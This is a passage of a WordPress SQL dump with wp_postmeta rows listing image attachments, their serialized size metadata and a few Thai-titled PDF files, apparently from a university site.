(27097, 10917, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:13:\"2020/12/3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"3-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"3-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27098, 10918, '_wp_attached_file', '2020/12/4.jpg'),
(27099, 10918, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:13:\"2020/12/4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"4-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"4-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"4-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27100, 10921, '_wp_attached_file', '2020/12/1-1.jpg'),
(27101, 10921, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2020/12/1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27102, 10922, '_wp_attached_file', '2020/12/2-1.jpg'),
(27103, 10922, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2020/12/2-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27104, 10924, '_edit_lock', '1607328504:14'),
(27105, 10924, '_edit_last', '14'),
(27106, 10925, '_wp_attached_file', '2020/12/ครูสอนภาษาอังกฤษ.pdf'),
(27109, 10924, '_hide_featured', NULL),
(27114, 10927, '_edit_lock', '1608520889:14'),
(27115, 10927, '_edit_last', '14'),
(27116, 10929, '_wp_attached_file', '2020/12/จนท.งานสวัสดิการ.pdf'),
(27119, 10927, '_hide_featured', NULL),
(27122, 10931, '_wp_attached_file', '2020/12/1-2.jpg'),
(27123, 10931, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:15:\"2020/12/1-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-2-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-2-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-2-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-2-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27124, 10932, '_wp_attached_file', '2020/12/2-2.jpg'),
(27125, 10932, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:15:\"2020/12/2-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-2-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-2-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-2-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-2-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27126, 10933, '_wp_attached_file', '2020/12/3-1.jpg'),
(27127, 10933, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:15:\"2020/12/3-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3-1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"3-1-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"3-1-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27128, 10934, '_wp_attached_file', '2020/12/4-1.jpg'),
(27129, 10934, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:15:\"2020/12/4-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"4-1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"4-1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"4-1-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"4-1-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27130, 10935, '_wp_attached_file', '2020/12/5.jpg'),
(27131, 10935, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:13:\"2020/12/5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"5-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"5-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"5-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"5-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27132, 10936, '_wp_attached_file', '2020/12/6.jpg'),
(27133, 10936, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:13:\"2020/12/6.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"6-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"6-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"6-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"6-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27134, 10938, '_wp_attached_file', '2020/12/7.jpg'),
(27135, 10938, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:13:\"2020/12/7.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"7-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"7-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"7-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"7-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27136, 10939, '_wp_attached_file', '2020/12/8.jpg'),
(27137, 10939, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:13:\"2020/12/8.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"8-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"8-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"8-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"8-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27138, 10940, '_wp_attached_file', '2020/12/9.jpg'),
(27139, 10940, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:13:\"2020/12/9.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"9-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"9-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"9-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"9-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27140, 10941, '_wp_attached_file', '2020/12/10.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(27141, 10941, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"10-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"10-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"10-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"10-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27142, 10942, '_wp_attached_file', '2020/12/11.jpg'),
(27143, 10942, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"11-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"11-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"11-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"11-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27144, 10943, '_wp_attached_file', '2020/12/12.jpg'),
(27145, 10943, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/12.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"12-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"12-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"12-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"12-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27146, 10944, '_wp_attached_file', '2020/12/13.jpg'),
(27147, 10944, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2008;s:4:\"file\";s:14:\"2020/12/13.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"13-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"13-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"13-1024x586.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:586;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:14:\"13-400x229.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"